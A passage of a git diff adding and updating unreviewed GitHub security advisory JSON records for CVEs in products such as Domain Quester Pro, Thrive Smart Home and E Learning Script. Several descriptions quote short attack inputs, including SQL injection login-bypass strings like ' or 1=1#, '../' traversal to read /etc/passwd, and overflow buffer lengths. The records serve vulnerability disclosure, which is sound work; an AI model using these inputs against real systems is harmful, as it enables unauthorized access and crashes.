+ "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-58fv-c7h9-wg86/GHSA-58fv-c7h9-wg86.json b/advisories/unreviewed/2026/02/GHSA-58fv-c7h9-wg86/GHSA-58fv-c7h9-wg86.json new file mode 100644 index 0000000000000..9e414427509ea --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-58fv-c7h9-wg86/GHSA-58fv-c7h9-wg86.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-58fv-c7h9-wg86", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25319" + ], + "details": "Domain Quester Pro 6.02 contains a stack overflow vulnerability that allows remote attackers to execute arbitrary code by overwriting Structured Exception Handler (SEH) registers. Attackers can craft a malicious payload targeting the 'Domain Name Keywords' input field to trigger an access violation and execute a bind shell on port 9999.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25319" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47825" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/domain-quester-pro-stack-overflow-seh" + }, + { + "type": "WEB", + "url": "http://www.internet-soft.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5fwp-233p-3m7m/GHSA-5fwp-233p-3m7m.json b/advisories/unreviewed/2026/02/GHSA-5fwp-233p-3m7m/GHSA-5fwp-233p-3m7m.json index 45b2b79f20cef..e77eac1442e81 100644 --- a/advisories/unreviewed/2026/02/GHSA-5fwp-233p-3m7m/GHSA-5fwp-233p-3m7m.json +++ b/advisories/unreviewed/2026/02/GHSA-5fwp-233p-3m7m/GHSA-5fwp-233p-3m7m.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5fwp-233p-3m7m", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T00:32:51Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20650" ], "details": "A denial-of-service issue was addressed with improved validation. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An attacker in a privileged network position may be able to perform denial-of-service attack using crafted Bluetooth packets.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:07Z" diff --git a/advisories/unreviewed/2026/02/GHSA-649g-63pg-hvqg/GHSA-649g-63pg-hvqg.json b/advisories/unreviewed/2026/02/GHSA-649g-63pg-hvqg/GHSA-649g-63pg-hvqg.json new file mode 100644 index 0000000000000..60139eb575778 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-649g-63pg-hvqg/GHSA-649g-63pg-hvqg.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-649g-63pg-hvqg", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2025-70092" + ], + "details": "A cross-site scripting (XSS) vulnerability in the Item Kits function of OpenSourcePOS v3.4.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Item Name parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70092" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70092.md" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6qxf-3mq6-3g8x/GHSA-6qxf-3mq6-3g8x.json b/advisories/unreviewed/2026/02/GHSA-6qxf-3mq6-3g8x/GHSA-6qxf-3mq6-3g8x.json new file mode 100644 index 0000000000000..9c21815884411 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6qxf-3mq6-3g8x/GHSA-6qxf-3mq6-3g8x.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6qxf-3mq6-3g8x", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25329" + ], + "details": "FTP Navigator 8.03 contains a denial of service vulnerability that allows attackers to crash the application by overwriting Structured Exception Handler (SEH) with malicious input. Attackers can generate a payload of 4108 'A' characters followed by 4 'B' characters and 40 'C' characters to trigger a program crash when pasted into the custom command input.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25329" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47794" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ftp-navigator-custom-command-denial-of-service-seh" + }, + { + "type": "WEB", + "url": "http://www.internet-soft.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6vwx-x7rh-q2gj/GHSA-6vwx-x7rh-q2gj.json b/advisories/unreviewed/2026/02/GHSA-6vwx-x7rh-q2gj/GHSA-6vwx-x7rh-q2gj.json new file mode 100644 index 0000000000000..af0867a500170 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6vwx-x7rh-q2gj/GHSA-6vwx-x7rh-q2gj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6vwx-x7rh-q2gj", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25342" + ], + "details": "Centova Cast 3.2.12 contains a denial of service vulnerability that allows attackers to overwhelm the system by repeatedly calling the database export API endpoint. Attackers can trigger 100% CPU load by sending multiple concurrent requests to the /api.php endpoint with crafted parameters.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25342" + }, + { + "type": "WEB", + "url": "https://centova.com" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47677" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/centova-cast-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6w4g-qqq8-cvqr/GHSA-6w4g-qqq8-cvqr.json b/advisories/unreviewed/2026/02/GHSA-6w4g-qqq8-cvqr/GHSA-6w4g-qqq8-cvqr.json new file mode 100644 index 0000000000000..f2a8da5e30149 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6w4g-qqq8-cvqr/GHSA-6w4g-qqq8-cvqr.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6w4g-qqq8-cvqr", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25333" + ], + "details": "Bullwark Momentum Series JAWS 1.0 contains a directory traversal vulnerability that allows unauthenticated attackers to access system files by manipulating HTTP request paths. Attackers can exploit the vulnerability by sending crafted GET requests with multiple '../' sequences to read sensitive files like /etc/passwd outside the web root directory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25333" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20190729023518/http://www.bullwark.net" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47773" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/bullwark-momentum-series-jaws-momentum-series-jaws" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7p49-g593-x646/GHSA-7p49-g593-x646.json b/advisories/unreviewed/2026/02/GHSA-7p49-g593-x646/GHSA-7p49-g593-x646.json index 64a6b11defed7..c9170b6be6984 100644 --- a/advisories/unreviewed/2026/02/GHSA-7p49-g593-x646/GHSA-7p49-g593-x646.json +++ b/advisories/unreviewed/2026/02/GHSA-7p49-g593-x646/GHSA-7p49-g593-x646.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-7p49-g593-x646", - "modified": "2026-02-12T18:30:23Z", + "modified": "2026-02-13T00:32:51Z", "published": "2026-02-12T18:30:23Z", "aliases": [ "CVE-2025-70886" ], "details": "An issue in halo v.2.22.4 and before allows a remote attacker to cause a denial of service via a crafted payload to the public comment submission endpoint", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T16:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-869w-qxf5-5q39/GHSA-869w-qxf5-5q39.json b/advisories/unreviewed/2026/02/GHSA-869w-qxf5-5q39/GHSA-869w-qxf5-5q39.json new file mode 100644 index 0000000000000..787ab83616b6c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-869w-qxf5-5q39/GHSA-869w-qxf5-5q39.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-869w-qxf5-5q39", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2025-40905" + ], + "details": "WWW::OAuth 1.000 and earlier for Perl uses the rand() function as the default source of entropy, which is not cryptographically secure, for cryptographic functions.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40905" + }, + { + "type": "WEB", + "url": "https://metacpan.org/release/DBOOK/WWW-OAuth-1.000/source/lib/WWW/OAuth.pm#L86" + }, + { + "type": "WEB", + "url": "https://perldoc.perl.org/functions/rand" + }, + { + "type": "WEB", + "url": "https://security.metacpan.org/docs/guides/random-data-for-security.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-338" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T00:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8jg3-vm8w-m4r8/GHSA-8jg3-vm8w-m4r8.json b/advisories/unreviewed/2026/02/GHSA-8jg3-vm8w-m4r8/GHSA-8jg3-vm8w-m4r8.json index e3a815e9ca13e..c8390dab012f1 100644 --- a/advisories/unreviewed/2026/02/GHSA-8jg3-vm8w-m4r8/GHSA-8jg3-vm8w-m4r8.json +++ b/advisories/unreviewed/2026/02/GHSA-8jg3-vm8w-m4r8/GHSA-8jg3-vm8w-m4r8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8jg3-vm8w-m4r8", - "modified": "2026-02-11T21:30:40Z", + "modified": "2026-02-13T00:32:51Z", "published": "2026-02-11T21:30:40Z", "aliases": [ "CVE-2024-50618" ], "details": "A Use of Single-factor Authentication vulnerability in the Authentication component of CIPPlanner CIPAce before 9.17 allows attackers to bypass a protection mechanism. When the system is configured to allow login with internal accounts, an attacker can possibly obtain full authentication if the secret in a single-factor authentication scheme gets compromised.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-308" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T20:16:07Z" diff --git a/advisories/unreviewed/2026/02/GHSA-92fh-pv8f-mv7c/GHSA-92fh-pv8f-mv7c.json b/advisories/unreviewed/2026/02/GHSA-92fh-pv8f-mv7c/GHSA-92fh-pv8f-mv7c.json new file mode 100644 index 0000000000000..c37d8b73778b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-92fh-pv8f-mv7c/GHSA-92fh-pv8f-mv7c.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-92fh-pv8f-mv7c", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25320" + ], + "details": "E Learning Script 1.0 contains an authentication bypass vulnerability that allows attackers to access the dashboard without valid credentials by manipulating login parameters. Attackers can exploit the /login.php file by sending a specific payload '=''or' to bypass authentication and gain unauthorized access to the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25320" + }, + { + "type": "WEB", + "url": "https://github.com/amitkolloldey/elearning-script" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47811" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/elearning-script-authentication-bypass" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9vhj-ww26-xqw7/GHSA-9vhj-ww26-xqw7.json b/advisories/unreviewed/2026/02/GHSA-9vhj-ww26-xqw7/GHSA-9vhj-ww26-xqw7.json new file mode 100644 index 0000000000000..33fd79ffe1297 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9vhj-ww26-xqw7/GHSA-9vhj-ww26-xqw7.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9vhj-ww26-xqw7", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25334" + ], + "details": "Product Key Explorer 4.2.0.0 contains a denial of service vulnerability that allows local attackers to crash the application by overflowing the registration name input field. Attackers can create a specially crafted text file with repeated characters to trigger a buffer overflow when pasted into the registration name field, causing the application to crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25334" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47766" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/product-key-explorer-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9wpq-3w4j-985q/GHSA-9wpq-3w4j-985q.json b/advisories/unreviewed/2026/02/GHSA-9wpq-3w4j-985q/GHSA-9wpq-3w4j-985q.json new file mode 100644 index 0000000000000..da3c40e2a320f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9wpq-3w4j-985q/GHSA-9wpq-3w4j-985q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9wpq-3w4j-985q", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2020-37167" + ], + "details": "ClamAV ClamBC bytecode interpreter contains a vulnerability in function name processing that allows attackers to manipulate bytecode function names. Attackers can exploit the weak input validation in function name encoding to potentially execute malicious bytecode or cause unexpected behavior in the ClamAV engine.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37167" + }, + { + "type": "WEB", + "url": "https://www.clamav.net" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47687" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/clamav-clambc-clambc-executable-regular-expression" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cgv7-pmv5-q49x/GHSA-cgv7-pmv5-q49x.json b/advisories/unreviewed/2026/02/GHSA-cgv7-pmv5-q49x/GHSA-cgv7-pmv5-q49x.json new file mode 100644 index 0000000000000..33e33309210dc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cgv7-pmv5-q49x/GHSA-cgv7-pmv5-q49x.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cgv7-pmv5-q49x", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25328" + ], + "details": "XnConvert 1.82 contains a denial of service vulnerability in its registration code input field that allows attackers to crash the application. Attackers can generate a 9000-byte buffer of repeated characters and paste it into the registration code field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25328" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47801" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/xnconvert-denial-of-service" + }, + { + "type": "WEB", + "url": "https://www.xnview.com" + }, + { + "type": "WEB", + "url": "https://www.xnview.com/en/apps" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g6q7-8v7v-98q7/GHSA-g6q7-8v7v-98q7.json b/advisories/unreviewed/2026/02/GHSA-g6q7-8v7v-98q7/GHSA-g6q7-8v7v-98q7.json new file mode 100644 index 0000000000000..44c8f077e7386 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g6q7-8v7v-98q7/GHSA-g6q7-8v7v-98q7.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g6q7-8v7v-98q7", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25325" + ], + "details": "Thrive Smart Home 1.1 contains an SQL injection vulnerability in the checklogin.php endpoint that allows unauthenticated attackers to bypass authentication by manipulating the 'user' POST parameter. Attackers can inject malicious SQL code like ' or 1=1# to manipulate login queries and gain unauthorized access to the application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25325" + }, + { + "type": "WEB", + "url": "https://cxsecurity.com/issue/WLB-2020010019" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/173728" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/155797" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47814" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/thrive-smart-home-smart-home-improper-limitation-o" + }, + { + "type": "WEB", + "url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5554.php" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ggf8-hhhc-6pgc/GHSA-ggf8-hhhc-6pgc.json b/advisories/unreviewed/2026/02/GHSA-ggf8-hhhc-6pgc/GHSA-ggf8-hhhc-6pgc.json new file mode 100644 index 0000000000000..5f007012adf0b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ggf8-hhhc-6pgc/GHSA-ggf8-hhhc-6pgc.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ggf8-hhhc-6pgc", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25341" + ], + "details": "iNetTools for iOS 8.20 contains a denial of service vulnerability in the Whois feature that allows attackers to crash the application by manipulating input. Attackers can paste a specially crafted 98-character buffer into the Domain Name field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25341" + }, + { + "type": "WEB", + "url": "https://apps.apple.com/mx/app/inettools-ping-dns-port-scan/id561659975" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47716" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/inettools-for-ios-whois-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-grvx-723j-w74g/GHSA-grvx-723j-w74g.json b/advisories/unreviewed/2026/02/GHSA-grvx-723j-w74g/GHSA-grvx-723j-w74g.json new file mode 100644 index 0000000000000..74aca8240a614 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-grvx-723j-w74g/GHSA-grvx-723j-w74g.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-grvx-723j-w74g", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25331" + ], + "details": "AVS Audio Converter 9.1 contains a local buffer overflow vulnerability that allows local attackers to overwrite CPU registers by manipulating the 'Exit folder' input field. Attackers can craft a specially designed text file with 264 bytes of padding followed by register overwrite values to compromise the application and potentially execute arbitrary code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25331" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47788" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/avs-audio-converter-exit-folder-buffer-overflow" + }, + { + "type": "WEB", + "url": "http://www.avs4you.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h5j4-jj3m-xgpg/GHSA-h5j4-jj3m-xgpg.json b/advisories/unreviewed/2026/02/GHSA-h5j4-jj3m-xgpg/GHSA-h5j4-jj3m-xgpg.json new file mode 100644 index 0000000000000..5ecd149497244 --- /dev/null +++ 